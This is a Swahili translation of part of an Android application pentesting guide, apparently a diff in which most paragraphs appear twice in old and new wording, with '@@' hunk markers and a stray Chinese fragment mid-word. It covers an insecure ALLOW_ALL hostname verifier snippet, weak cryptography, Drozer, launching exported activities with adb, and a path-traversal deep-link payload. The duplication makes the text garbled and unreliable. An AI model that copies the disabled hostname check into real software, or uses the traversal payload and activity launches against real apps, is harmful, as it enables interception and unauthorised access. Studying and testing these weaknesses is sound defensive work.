Kwa sababu fulani wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifai na mistari ya msimbo kama ifuatayo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
Njia nzuri ya kujaribu hii ni kujaribu kunasa trafiki kwa kutumia proxy kama Burp bila kuthibitisha Burp CA ndani ya kifaa. Pia, unaweza kuz生成 certificate na Burp kwa hostname tofauti na kuitumia.
### Kriptografia Imevunjika
### Kriptografia Iliyovunjika
**Mchakato Duni wa Usimamizi wa Vifunguo**
**Mchakato Duni wa Usimamizi wa Funguo**
Baadhi ya watengenezaji huhifadhi data nyeti kwenye storage ya ndani na kuiweka kwa encrypto na key iliyowekwa ndani/kutabirika ndani ya code. Hii haipaswi kufanywa kwa sababu reversing inaweza kumruhusu mshambuliaji kutoa taarifa za siri.
Baadhi ya developers huhifadhi data nyeti kwenye storage ya ndani na kuikryptisha na ufunguo uliowekwa ndani/unaoweza kutabirika kwenye code. Hii haipaswi kufanywa kwa sababu reversing inaweza kuruhusu attackers kutoa taarifa za siri.
**Matumizi ya Algorithms Yasiyo Salama na/au Yaliyopitwa na Wakati**
**Matumizi ya Algorithimu zisizo salama na/au Zilizotumika kwa Muda Mrefu**
Watengenezaji hawapaswi kutumia **deprecated algorithms** kufanya **checks** za uthibitishaji, **store** au **kutuma** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi nywila kwa mfano, inapaswa kutumika hashes zenye uwezo wa kupinga brute-force pamoja na salt.
Developers hawapaswi kutumia **deprecated algorithms** kufanya authorization **checks**, **store** au **send** data. Baadhi ya algorithm hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi nywila kwa mfano, hash ambazo ni **brute-force resistant** zinapaswa kutumika pamoja na salt.
### Mambo mengine ya kukagua
- Inashauriwa **kupotosha APK** ili kuleta ugumu kwa reverse engineer.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kufanya **mithili zake ya kukagua kama simu ime-root** na kuchukua hatua zinazofaa.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kukagua kama **emulator** inatumika.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa **kukagua uadilifu wake kabla ya kuitekeleza** ili kuona ikiwa imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) ili kukagua compiler/packer/obfuscator iliyotumika kujenga APK
- Inapendekezwa **ku-obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa attackers.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kufanya **checks zake kuona kama simu ime-rooted** na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kuangalia kama **emulator** inatumiwa.
- Ikiwa app ni nyeti (kama bank apps), inapaswa **kuangalia integriti yake kabla ya kuitekeleza** ili kuhakikisha haijabadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuona compiler/packer/obfuscator gani ilitumiwa kujenga APK
### React Native Application
Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi javascript code ya React applications:
Soma ukurasa ufuatao ili kujifunza jinsi ya kupata javascript code za React applications kwa urahisi:
{{#ref}}
@ -188,7 +188,7 @@ react-native-application.md
### Xamarin Applications
Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi C# code ya xamarin applications:
Soma ukurasa ufuatao ili kujifunza jinsi ya kupata C# code za xamarin applications kwa urahisi:
{{#ref}}
@ -197,17 +197,17 @@ Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi C# code ya xamarin ap
### Superpacked Applications
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni algorithm ya Meta inayoshinikiza yaliyomo ya application ndani ya faili moja. Blogu inazungumzia kuhusu uwezekano wa kuunda app inayo-decompress aina hizi za apps... na njia ya haraka ambayo inahusisha **kufanya execute application na kukusanya files zilizodecompressed kutoka kwenye filesystem.**
Kulingana na [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayobana (compress) yaliyomo ya application ndani ya faili moja. Blogu inazungumzia uwezekano wa kuunda app inayoweza ku-decompress aina hizi za apps... na njia ya haraka zaidi ambayo inahusisha **ku-execute application na kukusanya files zilizo-decompressed kutoka filesystem.**
### Automated Static Code Analysis
Tool [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupata **vulnerabilities** kwa **kuscan** **code** ya application. Tool hii ina orodha ya **known sources** (zinazoelezea kwa tool **maeneo** ambapo **input** inadhibitiwa na mtumiaji), **sinks** (zinazoelezea kwa tool **maeneo hatari** ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaelezea **mchanganyiko** wa **sources-sinks** unaoashiria vulnerability.
Tool ya [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupatikana kwa kutafuta **vulnerabilities** kwa **scanning** **code** ya application. Tool hii ina mfululizo wa **known sources** (inayoonyesha sehemu kwa tool ambapo **input** iko **controlled by the user**), **sinks** (inayoonyesha sehemu **dangerous** ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Kanuni hizi zinaeleza **mchanganyiko** wa **sources-sinks** unaoashiria udhaifu.
Kwa uelewa huu, **mariana-trench itapitia code na kupata uwezekano wa vulnerabilities ndani yake**.
Kwa maarifa haya, **mariana-trench itapitia code na kupata udhaifu unaowezekana ndani yake**.
### Secrets leaked
Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia tool kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
Application inaweza kuwa na siri (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia zana kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
@ -216,14 +216,14 @@ Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomain
bypass-biometric-authentication-android.md
{{#endref}}
### Other interesting functions
### Mengineyo ya kazi za kuvutia
- **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- **Utekelezaji wa Msimbo**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Kutuma SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Funsi za native** zilizo elezwa kama `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
### **Other tricks**
### **Mab trick mengine**
{{#ref}}
@ -234,15 +234,15 @@ content-protocol.md
---
## Dynamic Analysis
## Uchambuzi wa Muda
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusanidi application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa kilichoroot-ikiwa (emulated au sio) kinapendekezwa sana.
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusakinisha application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa chenye root (emulated au siyo) kinashauriwa sana.
### Online Dynamic analysis
Unaweza kuunda **akaunti ya bure** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **kupakia** na **kufanya execute** APKs, hivyo ni muhimu kuona jinsi apk inavyotenda.
Unaweza kuunda **free account** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyo behave.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuunganishwa kupitia **adb**.
Hata unaweza **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
![](<../../images/image (831).png>)
@ -252,112 +252,112 @@ Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda vifaa **x86** na **arm**, na kulingana na [**hii** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**matoleo ya hivi karibuni ya x86** yanaunga mkono **ARM libraries** bila hitaji la emulator ya arm iliyokuwa polepole).
- Jifunze kuiseti kupitia ukurasa huu:
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**hii** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji slow arm emulator).
- Jifunze jinsi ya kuiweka hapa:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(toleo la bure:** Personal Edition, unahitaji kuunda akaunti. _Inapendekezwa **kushusha** toleo **LENYE**_ _**VirtualBox** ili kuepuka makosa ya uwezekano._)
- [**Nox**](https://es.bignox.com) (Bure, lakini haiku-support Frida au Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, unahitaji kuunda account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** ili kuepuka makosa ya uwezekano._)
- [**Nox**](https://es.bignox.com) (Free, lakini haitsupport Frida au Drozer).
> [!TIP]
> Unapounda emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kuwa polepole zaidi. Hivyo chagua skrini ndogo inapowezekana.
> Unapotengeneza emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kukimbia polepole. Hivyo chagua skrini ndogo iwezekanavyo.
Ili **kusakinisha google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilicho alama nyekundu kwenye picha ifuatayo:
Ili **kusakinisha google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilichowekwa kwa rangi nyekundu kwenye picha ifuatayo:
![](<../../images/image (277).png>)
Pia, kumbuka kwamba kwenye **mipangilio ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utakuwa unajiunganisha na Android VM kutoka VM tofauti yenye tools).
Pia, fahamu kuwa katika **configuration ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utaungana kwenye Android VM kutoka VM tofauti yenye tools).
#### Use a physical device
Unahitaji kuamilisha chaguo za **debugging** na itakuwa vizuri kama unaweza kui-**root**:
Unahitaji kuwezesha chaguzi za **debugging** na itakuwa vizuri ikiwa unaweza kuendelea kui-**root**:
1. **Settings**.
2. (FromAndroid 8.0) Chagua **System**.
3. Chagua **About phone**.
4. Bonyeza **Build number** mara 7.
5. Rudi nyuma na utapata **Developer options**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
> Mara baada ya kusakinisha application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, jinsi inavyofanya kazi na kujisikia mwenyewe nayo.\
> Ninapendekeza **kutekeleza uchambuzi huu wa awali wa dynamic kwa kutumia MobSF dynamic analysis + pidcat**, ili tuweze **kujifunza jinsi application inavyofanya kazi** wakati MobSF inavyokamata data nyingi **zinazovutia** utakazoweza kuzipitia baadaye.
> Mara baada ya kusakinisha application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, inafanya kazi vipi na kuzoea kuifanya.\
> Napendekeza **kufanya uchambuzi huu wa awali wa dynamic kwa kutumia MobSF dynamic analysis + pidcat**, hivyo tutaweza **kujifunza jinsi application inavyofanya kazi** wakati MobSF inakayaza data nyingi **zazovutia** ambazo unaweza kuzitathmini baadaye.
### Unintended Data Leakage
**Logging**
Watengenezaji wanapaswa kuwa waangalifu kuhusu kufichua **maelezo ya debugging** hadharani, kwani inaweza kusababisha sensitive data leak. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kufuatilia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wake wa matumizi na uwazi wa kusoma.
Developers wanapaswa kuwa waangalifu kutoonyesha **debugging information** hadharani, kwa maana inaweza kusababisha sensitive data leaks. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kufuatilia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wa matumizi na readability.
> [!WARNING]
> Kumbuka kwamba tangu **toleo lililozidi Android 4.0**, **applications zinaweza kufikia tu logs zao wenyewe**. Hivyo applications hawawezi kufikia logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log maelezo nyeti**.
> Kumbuka kuwa kutoka **later newer than Android 4.0**, **applications are only able to access their own logs**. Hivyo applications haziwezi kupata logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kutoi-log taarifa nyeti**.
**Copy/Paste Buffer Caching**
Mfumo wa **clipboard-based** wa Android unawezesha kazi ya copy-paste katika apps, lakini una hatari kwa sababu **applications nyingine** zinaweza **kupata** clipboard, ambayo inaweza kufichua data nyeti. Ni muhimu **kuzima kazi za copy/paste** kwa sehemu nyeti za application, kama taarifa za kadi za mkopo, ili kuzuia data leak.
Mfumo wa Android unaotegemea **clipboard** unaruhusu ufanyaji wa copy-paste katika apps, lakini una hatari ya kuwa **applications nyingine** zinaweza **access** clipboard, kwa hivyo zinaweza kufunua data nyeti. Ni muhimu **kuzima kazi za copy/paste** kwa sehemu nyeti za application, kama maelezo ya kadi ya mkopo, ili kuzuia data leaks.
**Crash Logs**
Ikiwa application **inaanguka** na **kuhifadhi logs**, logs hizi zinaweza kumsaidia mshambuliaji, hasa wakati application haiwezi ku-reverse-engineer. Ili kupunguza hatari hii, epuka ku-log kwenye crashes, na kama logs lazima zitumwe kupitia mtandao, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Ikiwa application inavunjika (crashes) na **inahifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa wakati application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka kuandika logs wakati wa crash, na ikiwa logs lazima zitumwa kwenye network, hakikisha zinatumwa kwa njia ya SSL kwa usalama.
Kama pentester, **jaribu kuangalia logs hizi**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya kusababisha data nyeti leak kutokana na utekelezaji mbaya wa watengenezaji. Ili kubaini leak za data, inashauriwa **kuchukua traffic ya application** na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za third-party.
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya **leak sensitive data** kutokana na utekelezaji usio sahihi na developers. Ili kubaini potential data leaks, inashauriwa **ku-intercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa huduma za watu wa tatu.
### SQLite DBs
Wengi wa applications watatumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizo hifadhiwa kwa sababu unaweza kupata **taarifa nyeti** (ambayo itakuwa vulnerability).\
Databases zinapaswa kuwa ziko katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Wengi wa applications zitatafuta kutumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwa sababu unaweza kupata habari nyeti (ambayo inaweza kuwa vulnerability).\
Databases zinapaswa kuwa ziko kwenye `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Ikiwa database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **kupata** **password** ndani ya application, bado ni **vulnerability**.
Ikiwa database inahifadhi taarifa za siri na ime **encrypted** lakini unaweza **find** **password** ndani ya application bado ni **vulnerability**.
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za tables kwa kufanya `.schema <table_name>`
Taja meza (tables) kwa kutumia `.tables` na orodhesha columns za meza kwa kutumia `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha **kuchukua nafasi ya Android app** na kuingiliana na apps nyingine. Inaweza kufanya **kila kitu ambacho application iliyosakinishwa inaweza kufanya**, kama kutumia mekanisma ya Inter-Process Communication (IPC) ya Android na kuingiliana na operating system ya msingi. .\
Drozer ni tool muhimu ya **kufanya exploit kwa exported activities, exported services na Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Androids Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer ni tool muhimu ya **exploit exported activities, exported services and Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Kumbuka pia kwamba code ya activity huanza katika method ya **`onCreate`**.
Kumbuka pia kwamba code ya activity inaanzia katika method ya **`onCreate`**.
**Authorisation bypass**
Wakati Activity ime-exported unaweza kuitangaza screen yake kutoka kwa app ya nje. Hivyo, ikiwa activity yenye **taarifa nyeti** ime-**exported** unaweza **kupitia** **mechanisms za authentication** ili kuifikia.
Wakati Activity ime-exported unaweza kuitia kwenye screen kutoka kwa app ya nje. Kwa hivyo, ikiwa activity yenye **taarifa nyeti** ime **exported** unaweza **bypass** mekanisme za **authentication** ili kuipata.
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
Unaweza pia kuanza exported activity kutoka adb:
Unaweza pia kuanzisha exported activity kutoka adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo za zamani (API versions < 21).
**TAARIFA**: MobSF itaona kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo za zamani (API versions < 21).
> [!TIP]
> Kumbuka kwamba an authorisation bypass si kila mara ni udhaifu; itategemea jinsi bypass inavyofanya kazi na taarifa gani zinaonyeshwa.
> Kumbuka kwamba authorisation bypass si kila mara ni vulnerability; yote yatategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonyeshwa.
**Sensitive information leakage**
**Activities pia zinaweza kurudisha matokeo**. Ikiwa utaweza kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha taarifa nyeti**, kuna sensitive information leakage.
**Activities can also return results**. Ikiwa unaweza kupata activity iliyotumwa (exported) na isiyolindwa ikiyaita method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
Ikiwa Tapjacking haizuiziwi, unaweza kutumia exported activity vibaya ili kufanya **mtumiaji afanye vitendo visivyotarajiwa**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
Kama tapjacking haizingwi, unaweza kutumia activity iliyotumwa (exported) kumuambia mtumiaji afanye vitendo visivyotarajiwa. Kwa maelezo zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa msingi hutumiwa kwa ajili ya **share data**. Ikiwa app ina content providers zinazopatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
Content providers kwa msingi hutumika **kushiriki data**. Ikiwa app ina content providers zinazopatikana, huenda ukaweza **kutoa sensitive** data kutoka kwazo. Ni muhimu pia kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vunerable.
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
@ -366,8 +366,7 @@ Content providers kwa msingi hutumiwa kwa ajili ya **share data**. Ikiwa app ina
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
Service kwa kawaida ni kitu ambacho **kinaweza kupokea data**, **kuita process** na **kurudisha** (au la) response. Hivyo, ikiwa application inatokeza baadhi ya services unapaswa **kuangalia** **code** ili kuelewa inafanya nini na **kujaribu** kwa njia **dynamically** ili kutoa taarifa za siri, kupita hatua za uthibitishaji...
Service kwa msingi ni kitu ambacho **kinaweza kupokea data**, **kuchakata** na **kurudisha** (au la) majibu. Hivyo, ikiwa application inatoa services, inapaswa **kagua** **code** ili kuelewa inafanya nini na **jaribu** kivitendo (**dynamically**) kupata taarifa za siri, kuzuia authentication measures...\
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
@ -375,17 +374,17 @@ Service kwa kawaida ni kitu ambacho **kinaweza kupokea data**, **kuita process**
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
Broadcast receiver itakuwa ikisubiri aina fulani ya message. Kulingana na jinsi receiver inavyoshughulikia message inaweza kuwa vulnerable.\
Broadcast receiver itakuwa ikisubiri aina fulani ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe, inaweza kuwa vunerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links kwa mkono, kwa kutumia zana kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
Unaweza kutafuta deep links kwa mikono, ukitumia zana kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **kivinjari**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Kumbuka kwamba unaweza **kuacha jina la package** na simu itaitisha app itakayofungua link hiyo._
_Kumbuka kwamba unaweza **omit the package name** na kifaa cha mkononi kitaiteisha moja kwa moja app inayofaa kufungua link hiyo._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
@ -400,45 +399,47 @@ Ili kupata **msimbo utakaoendeshwa katika App**, nenda kwenye activity inayoitwa
**Taarifa nyeti**
Kila unapopata deep link hakikisha kuwa **haipokei data nyeti (kama nywila) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
Kila unapopata deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
**Parameters in path**
**Vigezo katika path**
Unapaswa pia kukagua kama deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukigundua endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumiwa kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya users bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Taarifa zaidi kuhusu hili [hapa](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa **pia kukagua ikiwa deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}`, katika kesi hiyo unaweza kulazimisha path traversal kwa kuingia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value`.\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya users bila CSRF token na endpoint dhaifu ilitumia method sahihi) na aina nyingine yoyote ya vuln. Maelezo zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
Mrejeleo wa [ripoti ya bug bounty ya kuvutia](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
**More examples**
### Uchunguzi wa Tabaka la Usafirishaji na Makosa ya Uthibitishaji
Ripoti ya [bug bounty ya kuvutia](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
- **Certificates hazikaguliwi kila wakati ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuzia onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine ni dhaifu**, yakitumia insecure cipher suites. Udhaifu huu unafanya connection kuwa nyeti kwa man-in-the-middle (MITM) attacks, kuruhusu washambuliaji kuvunja usimbaji na kufikia data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia secure channels kisha kuwasiliana kwa non-secure channels kwa shughuli nyingine. Mbinu hii inashindwa kulinda data nyeti, kama session cookies au user details, dhidi ya interception na entities zenye nia mbaya.
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
- **Certificates hazichunguzwi kila mara ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine ni dhaifu**, yakitumia insecure cipher suites. Uraha huo unafanya koneksheni kuwa nyeti kwa man-in-the-middle (MITM) attacks, na kuruhusu watakanya ku-decrypt data.
- **Leakage of private information** ni hatari wakati applications zina-authenticate kwa kutumia secure channels lakini kisha kuwasiliana kwa channels zisizo-secure kwa miamala mingine. Njia hii hairuhusu ulinzi wa data nyeti, kama session cookies au user details, dhidi ya interception na wahalifu.
#### Certificate Verification
Tutazingatia **certificate verification**. Uadilifu wa server's certificate ni lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu misanidi isiyo salama ya TLS na uhamishaji wa data nyeti kupitia channels zisizosimbwa vinaweza kusababisha hatari kubwa. Kwa hatua za kina za kuthibitisha server certificates na kushughulikia udhaifu, [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
Tutazingatia **certificate verification**. Uadilifu wa server's certificate lazima uathibitishwe ili kuboresha usalama. Hii ni muhimu kwa sababu misanidi ya TLS isiyo salama na upeleka wa data nyeti kupitia channels zisizo-encrypted vinaweza kusababisha hatari kubwa. Kwa hatua za kina juu ya kuthibitisha server certificates na kushughulikia vulnerabilities, rasilimali hii [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
#### SSL Pinning
SSL Pinning ni kifaa cha usalama ambapo application inathibitisha server's certificate dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.
SSL Pinning ni hatua ya usalama ambapo application inathibitisha server's certificate dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.
#### Traffic Inspection
Ili kuchunguza HTTP traffic, ni muhimu **kusakinisha certificate ya proxy tool** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchunguza HTTP traffic, ni muhimu **kufunga certificate ya proxy tool** (km: Burp). Bila kufunga certificate hii, traffic iliyosimbwa huenda ikasionelezeka kupitia proxy. Kwa mwongozo wa jinsi ya kufunga custom CA certificate, [**click here**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Applications zinazolenga **API Level 24 and above** zinahitaji marekebisho ya Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza traffic iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza traffic iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).
Ikiwa **Flutter** inatumika lazima ufuate maelekezo kwenye [**this page**](flutter.md). Hii ni kwa sababu, kuingiza certificate tu kwenye store haitafanya kazi kwani Flutter ina orodha yake ya CA halali.
